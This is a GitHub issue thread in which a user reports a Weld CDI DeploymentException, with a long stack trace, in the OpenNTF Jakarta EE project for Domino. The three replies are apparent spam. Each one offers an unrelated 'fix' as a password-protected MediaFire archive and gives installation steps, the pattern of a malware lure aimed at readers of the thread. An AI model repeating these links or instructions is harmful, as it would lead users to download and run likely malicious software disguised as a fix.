### ISSUE TITLE
DeploymentException: WELD-001408: Unsatisfied dependencies for type GroupEntityMetadata with qualifiers @Default

### ISSUE THREAD

**Issue by perlausten** [OpenNTF/org.openntf.xsp.jakartaee#550]
Using the latest 3.1.0 build I get this error when starting my application.

```
Encountered exception trying to load CDI container. For more detailed information, please consult error-log-0.xml located in /local/notesdata/domino/workspace/logs
org.jboss.weld.exceptions.DeploymentException: WELD-001408: Unsatisfied dependencies for type GroupEntityMetadata with qualifiers @Default
  at injection point [BackedAnnotatedField] @Inject private org.eclipse.jnosql.mapping.reflection.DefaultEntitiesMetadata.extension
  at org.eclipse.jnosql.mapping.reflection.DefaultEntitiesMetadata.extension(DefaultEntitiesMetadata.java:0)
	at org.jboss.weld.bootstrap.Validator.validateInjectionPointForDeploymentProblems(Validator.java:379)
	at org.jboss.weld.bootstrap.Validator.validateInjectionPoint(Validator.java:294)
	at org.jboss.weld.bootstrap.Validator.validateGeneralBean(Validator.java:141)
	at org.jboss.weld.bootstrap.Validator.validateRIBean(Validator.java:163)
	at org.jboss.weld.bootstrap.Validator.validateBean(Validator.java:533)
	at org.jboss.weld.bootstrap.Validator.validateBeans(Validator.java:518)
	at org.jboss.weld.bootstrap.Validator.validateDeployment(Validator.java:493)
	at org.jboss.weld.bootstrap.WeldStartup.validateBeans(WeldStartup.java:497)
	at org.jboss.weld.bootstrap.WeldBootstrap.validateBeans(WeldBootstrap.java:94)
	at org.jboss.weld.environment.se.Weld.initialize(Weld.java:856)
	at org.openntf.xsp.jakarta.cdi.util.ContainerUtil.lambda$7(ContainerUtil.java:341)
	at java.base/java.security.AccessController.doPrivileged(AccessController.java:692)
	at org.openntf.xsp.jakarta.cdi.util.ContainerUtil.lambda$6(ContainerUtil.java:318)
	at org.openntf.xsp.jakarta.cdi.util.ContainerUtil.withLock(ContainerUtil.java:426)
	at org.openntf.xsp.jakarta.cdi.util.ContainerUtil.getContainer(ContainerUtil.java:275)
	at org.openntf.xsp.jakarta.cdi.impl.ContainerUtilProvider.getContainer(ContainerUtilProvider.java:33)
	at java.base/java.util.Optional.map(Optional.java:260)
	at org.openntf.xsp.jakarta.cdi.provider.ComponentModuleCDIContainerLocator.getContainer(ComponentModuleCDIContainerLocator.java:43)
	at org.openntf.xsp.jakarta.cdi.provider.DominoCDIProvider.getCDI(DominoCDIProvider.java:52)
	at jakarta.enterprise.inject.spi.CDI.getCDIProvider(CDI.java:78)
	at jakarta.enterprise.inject.spi.CDI.current(CDI.java:65)
	at org.openntf.xsp.jakarta.cdi.impl.CDIResolver.resolveVariable(CDIResolver.java:58)
	at com.ibm.xsp.javascript.ServerSideLocalObject.resolveVariable(ServerSideLocalObject.java:97)
	at com.ibm.xsp.javascript.ServerSideLocalObject.resolveAttribute(ServerSideLocalObject.java:73)
	at com.ibm.xsp.javascript.AbstractLocalObject._get(AbstractLocalObject.java:119)
	at com.ibm.xsp.javascript.AbstractLocalObject.getPropertyReference(AbstractLocalObject.java:101)
	at com.ibm.jscript.engine.ProgramContext.findGlobalScopeIdentifier(ProgramContext.java:143)
	at com.ibm.jscript.engine.ProgramContext.findIdentifier(ProgramContext.java:134)
	at com.ibm.jscript.ASTTree.ASTIdentifier.interpret(ASTIdentifier.java:105)
	at com.ibm.jscript.ASTTree.ASTCall.interpret(ASTCall.java:88)
	at com.ibm.jscript.ASTTree.binaryop.ASTBinaryDefaultOp.interpret(ASTBinaryDefaultOp.java:49)
	at com.ibm.jscript.ASTTree.ASTProgram.interpret(ASTProgram.java:119)
	at com.ibm.jscript.ASTTree.ASTProgram.interpretEx(ASTProgram.java:139)
	at com.ibm.jscript.JSExpression._interpretExpression(JSExpression.java:435)
	at com.ibm.jscript.JSExpression.access$1(JSExpression.java:424)
	at com.ibm.jscript.JSExpression$2.run(JSExpression.java:414)
	at java.base/java.security.AccessController.doPrivileged(AccessController.java:784)
	at com.ibm.jscript.JSExpression.interpretExpression(JSExpression.java:410)
	at com.ibm.jscript.JSExpression.evaluateValue(JSExpression.java:251)
	at com.ibm.jscript.JSExpression.evaluateValue(JSExpression.java:234)
	at com.ibm.xsp.javascript.JavaScriptInterpreter.interpret(JavaScriptInterpreter.java:222)
	at com.ibm.xsp.javascript.JavaScriptInterpreter.interpret(JavaScriptInterpreter.java:194)
	at com.ibm.xsp.binding.javascript.JavaScriptValueBinding.getValue(JavaScriptValueBinding.java:78)
	at com.ibm.xsp.page.compiled.ExpressionEvaluatorImpl.evaluateAsString(ExpressionEvaluatorImpl.java:63)
	at xsp.Layout$LayoutPage.initIncluderAsRoot(Layout.java:210)
	at com.ibm.xsp.page.compiled.AbstractCompiledPage.createTree(AbstractCompiledPage.java:249)
	at com.ibm.xsp.page.compiled.AbstractCompiledPage.addComponent(AbstractCompiledPage.java:389)
	at com.ibm.xsp.component.UIIncludeComposite.buildContents(UIIncludeComposite.java:453)
	at com.ibm.xsp.page.compiled.AbstractCompiledPage.initComponent(AbstractCompiledPage.java:334)
	at com.ibm.xsp.page.compiled.CompiledComponentBuilder.buildChildren(CompiledComponentBuilder.java:123)
	at com.ibm.xsp.page.compiled.CompiledComponentBuilder.buildAll(CompiledComponentBuilder.java:84)
	at com.ibm.xsp.component.UIViewRootEx.buildContents(UIViewRootEx.java:1783)
	at com.ibm.xsp.component.UIViewRootEx2.buildContents(UIViewRootEx2.java:247)
	at com.ibm.xsp.page.compiled.AbstractCompiledPage.initComponent(AbstractCompiledPage.java:334)
	at com.ibm.xsp.page.compiled.AbstractCompiledPage.createTree(AbstractCompiledPage.java:256)
	at com.ibm.xsp.page.compiled.AbstractCompiledPage.createViewRoot(AbstractCompiledPage.java:167)
	at com.ibm.xsp.application.ViewHandlerExImpl._createViewRoot(ViewHandlerExImpl.java:550)
	at com.ibm.xsp.application.ViewHandlerExImpl.createViewRoot(ViewHandlerExImpl.java:596)
	at com.ibm.xsp.application.ViewHandlerExImpl.doCreateView(ViewHandlerExImpl.java:144)
	at com.ibm.xsp.application.ViewHandlerEx.createView(ViewHandlerEx.java:90)
	at com.ibm.xsp.webapp.FacesServlet.serviceView(FacesServlet.java:254)
	at com.ibm.xsp.webapp.FacesServletEx.serviceView(FacesServletEx.java:164)
	at com.ibm.xsp.webapp.FacesServlet.service(FacesServlet.java:163)
	at com.ibm.xsp.webapp.FacesServletEx.service(FacesServletEx.java:145)
	at com.ibm.xsp.webapp.DesignerFacesServlet.service(DesignerFacesServlet.java:103)
	at com.ibm.designer.runtime.domino.adapter.ComponentModule.invokeServlet(ComponentModule.java:599)
	at com.ibm.domino.xsp.module.nsf.NSFComponentModule.invokeServlet(NSFComponentModule.java:1359)
	at com.ibm.designer.runtime.domino.adapter.ComponentModule$AdapterInvoker.invokeServlet(ComponentModule.java:886)
	at com.ibm.designer.runtime.domino.adapter.ComponentModule$ServletInvoker.doService(ComponentModule.java:829)
	at com.ibm.designer.runtime.domino.adapter.ComponentModule.doService(ComponentModule.java:588)
	at com.ibm.domino.xsp.module.nsf.NSFComponentModule.doService(NSFComponentModule.java:1343)
	at com.ibm.domino.xsp.module.nsf.NSFService.doServiceInternal(NSFService.java:725)
	at com.ibm.domino.xsp.module.nsf.NSFService.doService(NSFService.java:515)
	at com.mindoo.domino.jna.xsp.http.DominoJNAHttpService$2.call(DominoJNAHttpService.java:76)
	at com.mindoo.domino.jna.xsp.http.DominoJNAHttpService$2.call(DominoJNAHttpService.java:1)
	at com.mindoo.domino.jna.gc.NotesGC$3.run(NotesGC.java:557)
	at java.base/java.security.AccessController.doPrivileged(AccessController.java:692)
	at com.mindoo.domino.jna.gc.NotesGC.runWithAutoGC(NotesGC.java:552)
	at com.mindoo.domino.jna.xsp.http.DominoJNAHttpService.doService(DominoJNAHttpService.java:68)
	at com.ibm.designer.runtime.domino.adapter.LCDEnvironment.doService(LCDEnvironment.java:371)
	at com.ibm.designer.runtime.domino.adapter.LCDEnvironment.service(LCDEnvironment.java:327)
	at com.ibm.domino.xsp.bridge.http.engine.XspCmdManager.service(XspCmdManager.java:302)
com.ibm.xsp.webapp.FacesServlet$ExtendedServletException: com.ibm.xsp.exception.EvaluationExceptionEx: Error while executing JavaScript computed expression
Encountered exception trying to load CDI container. For more detailed information, please consult error-log-0.xml located in /local/notesdata/domino/workspace/logs
org.jboss.weld.exceptions.DeploymentException: WELD-001408: Unsatisfied dependencies for type GroupEntityMetadata with qualifiers @Default
  at injection point [BackedAnnotatedField] @Inject private org.eclipse.jnosql.mapping.reflection.DefaultEntitiesMetadata.extension
  at org.eclipse.jnosql.mapping.reflection.DefaultEntitiesMetadata.extension(DefaultEntitiesMetadata.java:0)
	at org.jboss.weld.bootstrap.Validator.validateInjectionPointForDeploymentProblems(Validator.java:379)
	at org.jboss.weld.bootstrap.Validator.validateInjectionPoint(Validator.java:294)
	at org.jboss.weld.bootstrap.Validator.validateGeneralBean(Validator.java:141)
	at org.jboss.weld.bootstrap.Validator.validateRIBean(Validator.java:163)
	at org.jboss.weld.bootstrap.Validator.validateBean(Validator.java:533)
	at org.jboss.weld.bootstrap.Validator.validateBeans(Validator.java:518)
	at org.jboss.weld.bootstrap.Validator.validateDeployment(Validator.java:493)
	at org.jboss.weld.bootstrap.WeldStartup.validateBeans(WeldStartup.java:497)
	at org.jboss.weld.bootstrap.WeldBootstrap.validateBeans(WeldBootstrap.java:94)
	at org.jboss.weld.environment.se.Weld.initialize(Weld.java:856)
	at org.openntf.xsp.jakarta.cdi.util.ContainerUtil.lambda$7(ContainerUtil.java:341)
	at java.base/java.security.AccessController.doPrivileged(AccessController.java:692)
	at org.openntf.xsp.jakarta.cdi.util.ContainerUtil.lambda$6(ContainerUtil.java:318)
	at org.openntf.xsp.jakarta.cdi.util.ContainerUtil.withLock(ContainerUtil.java:426)
	at org.openntf.xsp.jakarta.cdi.util.ContainerUtil.getContainer(ContainerUtil.java:275)
	at org.openntf.xsp.jakarta.cdi.impl.ContainerUtilProvider.getContainer(ContainerUtilProvider.java:33)
	at java.base/java.util.Optional.map(Optional.java:260)
	at org.openntf.xsp.jakarta.cdi.provider.ComponentModuleCDIContainerLocator.getContainer(ComponentModuleCDIContainerLocator.java:43)
	at org.openntf.xsp.jakarta.cdi.provider.DominoCDIProvider.getCDI(DominoCDIProvider.java:52)
	at jakarta.enterprise.inject.spi.CDI.getCDIProvider(CDI.java:78)
	at jakarta.enterprise.inject.spi.CDI.current(CDI.java:65)
	at org.openntf.xsp.jakarta.cdi.impl.CDIResolver.resolveVariable(CDIResolver.java:58)
	at com.ibm.xsp.javascript.ServerSideLocalObject.resolveVariable(ServerSideLocalObject.java:97)
	at com.ibm.xsp.javascript.ServerSideLocalObject.resolveAttribute(ServerSideLocalObject.java:73)
	at com.ibm.xsp.javascript.AbstractLocalObject._get(AbstractLocalObject.java:119)
	at com.ibm.xsp.javascript.AbstractLocalObject.getPropertyReference(AbstractLocalObject.java:101)
	at com.ibm.jscript.engine.ProgramContext.findGlobalScopeIdentifier(ProgramContext.java:143)
	at com.ibm.jscript.engine.ProgramContext.findIdentifier(ProgramContext.java:134)
	at com.ibm.jscript.ASTTree.ASTIdentifier.interpret(ASTIdentifier.java:105)
	at com.ibm.jscript.ASTTree.ASTCall.interpret(ASTCall.java:88)
	at com.ibm.jscript.ASTTree.binaryop.ASTBinaryDefaultOp.interpret(ASTBinaryDefaultOp.java:49)
	at com.ibm.jscript.ASTTree.ASTProgram.interpret(ASTProgram.java:119)
	at com.ibm.jscript.ASTTree.ASTProgram.interpretEx(ASTProgram.java:139)
	at com.ibm.jscript.JSExpression._interpretExpression(JSExpression.java:435)
	at com.ibm.jscript.JSExpression.access$1(JSExpression.java:424)
	at com.ibm.jscript.JSExpression$2.run(JSExpression.java:414)
	at java.base/java.security.AccessController.doPrivileged(AccessController.java:784)
	at com.ibm.jscript.JSExpression.interpretExpression(JSExpression.java:410)
	at com.ibm.jscript.JSExpression.evaluateValue(JSExpression.java:251)
	at com.ibm.jscript.JSExpression.evaluateValue(JSExpression.java:234)
	at com.ibm.xsp.javascript.JavaScriptInterpreter.interpret(JavaScriptInterpreter.java:222)
	at com.ibm.xsp.javascript.JavaScriptInterpreter.interpret(JavaScriptInterpreter.java:194)
	at com.ibm.xsp.binding.javascript.JavaScriptValueBinding.getValue(JavaScriptValueBinding.java:78)
	at com.ibm.xsp.page.compiled.ExpressionEvaluatorImpl.evaluateAsString(ExpressionEvaluatorImpl.java:63)
	at xsp.Layout$LayoutPage.initIncluderAsRoot(Layout.java:210)
	at com.ibm.xsp.page.compiled.AbstractCompiledPage.createTree(AbstractCompiledPage.java:249)
	at com.ibm.xsp.page.compiled.AbstractCompiledPage.addComponent(AbstractCompiledPage.java:389)
	at com.ibm.xsp.component.UIIncludeComposite.buildContents(UIIncludeComposite.java:453)
	at com.ibm.xsp.page.compiled.AbstractCompiledPage.initComponent(AbstractCompiledPage.java:334)
	at com.ibm.xsp.page.compiled.CompiledComponentBuilder.buildChildren(CompiledComponentBuilder.java:123)
	at com.ibm.xsp.page.compiled.CompiledComponentBuilder.buildAll(CompiledComponentBuilder.java:84)
	at com.ibm.xsp.component.UIViewRootEx.buildContents(UIViewRootEx.java:1783)
	at com.ibm.xsp.component.UIViewRootEx2.buildContents(UIViewRootEx2.java:247)
	at com.ibm.xsp.page.compiled.AbstractCompiledPage.initComponent(AbstractCompiledPage.java:334)
	at com.ibm.xsp.page.compiled.AbstractCompiledPage.createTree(AbstractCompiledPage.java:256)
	at com.ibm.xsp.page.compiled.AbstractCompiledPage.createViewRoot(AbstractCompiledPage.java:167)
	at com.ibm.xsp.application.ViewHandlerExImpl._createViewRoot(ViewHandlerExImpl.java:550)
	at com.ibm.xsp.application.ViewHandlerExImpl.createViewRoot(ViewHandlerExImpl.java:596)
	at com.ibm.xsp.application.ViewHandlerExImpl.doCreateView(ViewHandlerExImpl.java:144)
	at com.ibm.xsp.application.ViewHandlerEx.createView(ViewHandlerEx.java:90)
	at com.ibm.xsp.webapp.FacesServlet.renderFacesPage(FacesServlet.java:641)
	at com.ibm.xsp.webapp.FacesServlet.renderErrorPage(FacesServlet.java:531)
	at com.ibm.xsp.webapp.FacesServlet.service(FacesServlet.java:186)
	at com.ibm.xsp.webapp.FacesServletEx.service(FacesServletEx.java:145)
	at com.ibm.xsp.webapp.DesignerFacesServlet.service(DesignerFacesServlet.java:103)
	at com.ibm.designer.runtime.domino.adapter.ComponentModule.invokeServlet(ComponentModule.java:599)
	at com.ibm.domino.xsp.module.nsf.NSFComponentModule.invokeServlet(NSFComponentModule.java:1359)
	at com.ibm.designer.runtime.domino.adapter.ComponentModule$AdapterInvoker.invokeServlet(ComponentModule.java:886)
	at com.ibm.designer.runtime.domino.adapter.ComponentModule$ServletInvoker.doService(ComponentModule.java:829)
	at com.ibm.designer.runtime.domino.adapter.ComponentModule.doService(ComponentModule.java:588)
	at com.ibm.domino.xsp.module.nsf.NSFComponentModule.doService(NSFComponentModule.java:1343)
	at com.ibm.domino.xsp.module.nsf.NSFService.doServiceInternal(NSFService.java:725)
	at com.ibm.domino.xsp.module.nsf.NSFService.doService(NSFService.java:515)
	at com.mindoo.domino.jna.xsp.http.DominoJNAHttpService$2.call(DominoJNAHttpService.java:76)
	at com.mindoo.domino.jna.xsp.http.DominoJNAHttpService$2.call(DominoJNAHttpService.java:1)
	at com.mindoo.domino.jna.gc.NotesGC$3.run(NotesGC.java:557)
	at java.base/java.security.AccessController.doPrivileged(AccessController.java:692)
	at com.mindoo.domino.jna.gc.NotesGC.runWithAutoGC(NotesGC.java:552)
	at com.mindoo.domino.jna.xsp.http.DominoJNAHttpService.doService(DominoJNAHttpService.java:68)
	at com.ibm.designer.runtime.domino.adapter.LCDEnvironment.doService(LCDEnvironment.java:371)
	at com.ibm.designer.runtime.domino.adapter.LCDEnvironment.service(LCDEnvironment.java:327)
	at com.ibm.domino.xsp.bridge.http.engine.XspCmdManager.service(XspCmdManager.java:302)
com.ibm.xsp.exception.EvaluationExceptionEx: Error while executing JavaScript computed expression
CLFAD0211E: Exception thrown. For more detailed information, please consult error-log-0.xml located in /local/notesdata/domino/workspace/logs
CLFAD0246E: Exception occurred servicing request for: /db.nsf/index.xsp - HTTP Code: 500. For more detailed information, please consult error-log-0.xml located in /local/notesdata/domino/workspace/logs
```

**Comment by Evul88** [comment]
to fix your trouble check this fix, i see it in another issue,
https://app.mediafire.com/9mrkd33xulszl
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by Satyam1Deepu** [comment]
to fix your trouble check this fix, i see it in another issue,
https://app.mediafire.com/9mrkd33xulszl
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by HeinousAgenda38** [comment]
Download 
https://www.mediafire.com/file/5t7dozm7sptcuqj/fix.zip/file
password: changeme
In the installer menu, select "gcc."
